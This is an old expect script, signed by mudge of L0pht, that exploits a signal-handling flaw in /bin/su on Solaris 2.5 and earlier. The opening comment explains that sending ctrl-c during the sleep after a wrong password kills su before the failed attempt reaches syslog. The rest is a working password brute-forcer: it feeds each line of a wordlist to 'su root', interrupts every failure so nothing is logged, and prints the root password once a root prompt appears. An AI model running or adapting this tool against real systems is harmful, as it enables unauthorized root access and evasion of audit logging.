#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) mudge@L0pht.com

#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.	
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#    attempt to SU
#          |
#     succesfull
#    /          \
#   Y            N
#   |            |
# exec cmd     sleep
#                |
#             syslog
#                |
#              exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occured.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
#     .mudge


if { ($argc < 1) || ($argc > 1) } {
  puts "correct usage is : $argv0 pwfile"
  exit
}

set pwfile [open $argv "r"]

log_user 0
foreach line [split [read $pwfile] "\n"] {
  spawn su root
  expect "Password:"
  send "$line\n"
  # you might need to tweak this but it should be ok
  set timeout 2
  expect {
    "#" { puts "root password is $line\n" ; exit }
  }
  set id [ exp_pid ]
  exec kill -INT $id
}